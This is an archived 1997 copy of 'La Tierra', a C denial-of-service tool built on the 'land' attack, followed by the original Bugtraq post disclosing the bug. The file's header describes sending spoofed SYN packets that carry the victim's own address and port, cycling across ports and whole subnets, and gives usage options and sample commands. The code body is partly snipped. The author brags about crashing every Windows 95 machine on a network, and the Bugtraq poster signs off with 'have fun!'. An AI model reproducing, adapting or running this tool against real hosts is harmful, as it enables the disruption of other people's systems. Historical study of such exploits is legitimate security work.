/* [ http://www.rootshell.com/ ] */ /**************************************************************/ /* La Tierra v1.0 - by MondoMan (KeG), elmondo@usa.net */ /* Developed for stress testing Windows NT 4.0 Sp3 */ /* Modified version of land.c by m3lt, FLC */ /* */ /* This program crashes Windows 95, and will cause Windws NT */ /* 4.0, SP3 to utilize a high percentage of CPU. In some */ /* cases, CPU utilization peeks at %100. */ /* */ /* land.c description: */ /* land.c sends a spoofed packet with the SYN flag from the */ /* the same IP and port number as the destination. For */ /* example, if you want to crash 1.1.1.1, port 80, it would */ /* spoof 1.1.1.1 port 80 as the source. The problem is with */ /* NT Sp3, however, is once you do issue this packet to a */ /* port, NT Sp3 will ignore all other attempts - UNTIL .... */ /* */ /* La Tierra! */ /* */ /* La Tierra description: */ /* */ /* La Tierra basically works by sending NT Sp3 the same packet*/ /* used in land.c but to any port. Sounds simple? Theres */ /* more to it. Cycle through a range of ports - and see what */ /* happends. It doesn't appear to matter if the port is */ /* opened or closed :-) Since NT won't let this happen again */ /* on the same port, you simply change ports, and you can */ /* easily go back to the origianal port and it'll work again. */ /* */ /* As a test, I setup 2 NT Sp3 machines, ran latierra from my */ /* linux computer and watched as NT Sp3 tried to deal with it.*/ /* Just out of curiosity, I did a zone-transfer from my intra */ /* nets DNS server, wrote a perl script to walk the DNS table */ /* and blow-up every Windows 95 station it possibly could. */ /* Needless to say, my darn beeper starting going off! */ /* If using, VI, tab=3 (press ':', then set ts=3) */ /* If you want to send to an entire Class C range then */ /* simply specify the last octet with a '-', and the IP range */ /* will start at 1 and end with 254, incrementing with each */ /* loop. If Loop equals FOR_EVER, the loop cycles forever */ /* until the process is stopped. */ /* use the -h option for more help */ /* */ /* Good luck. */ /* */ /* Additional Parameters: */ /* */ /* -b beginning_port_number -e port_number */ /* -s seconds -l loop # of cycles */ /* default is every 7 seconds */ /* -o 1 supress additional output */ /* */ /* Compiled on Intel Pentium, 200mhz, RedHat Linux 2.0.27 */ /* */ /* gcc latierra.c -o latierra */ /* */ /**************************************************************/ #include stdio.h #include netdb.h #include arpa/inet.h #include netinet/in.h #include sys/types.h #include string.h #include getopt.h #include sys/socket.h #include netinet/ip.h #include netinet/ip_tcp.h #include netinet/protocols.h [snip...] printf("Arguments: -i dest_ip -b port# [-e port#] [-s seconds_delay] [-l loop]\n\n"); printf(" -i dest_ip = destination ip address such as 1.1.1.1\n"); printf(" If the last octet is '-', then the address will increment\n"); printf(" starting at 1, ending at 254 (Class C) on the next loop\n"); printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER); printf(" -b port# = beginning port number (required).\n"); printf(" -e port# = ending port number (optional)\n"); printf(" -s seconds = seconds before incrementing port count.\n"); printf(" -o 1 = supress additional output to screen.\n"); printf(" -l loop = number of times to loop through ports or scan. %d=forever.\n\n", FOR_EVER); printf(" Sample command lines:\n\n"); printf(" latierra -i 1.1.1.1 -b 80\n"); printf(" latierra -i 1.1.1.1 -b 23 -e 80 -s 2 -l 2 -o 1\n"); printf(" latierra -i 1.1.1.- -b 23 -e 80 -s 2 -l -5\n"); printf("\n -La Tierra\n"); return(-1); } [snip...] =-= From meltman@LAGGED.NET Wed Dec 10 13:28:49 1997 From: m3lt To: BUGTRAQ@NETSPACE.ORG Date: Thu, 20 Nov 1997 19:40:19 -0500 Subject: new TCP/IP bug in win95 hi, i recently discovered a bug which freezes win95 boxes. here's how it works: send a spoofed packet with the SYN flag set from a host, on an open port (such as 113 or 139), setting as source the SAME host and port (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock up. the piece of code included in this message does that, so... have fun! i haven't tested this bug on other platforms, i don't have the ressources. please feel free to do so. m3lt meltman@lagged.net --- snip snip ----------------------------------------------------------- =-=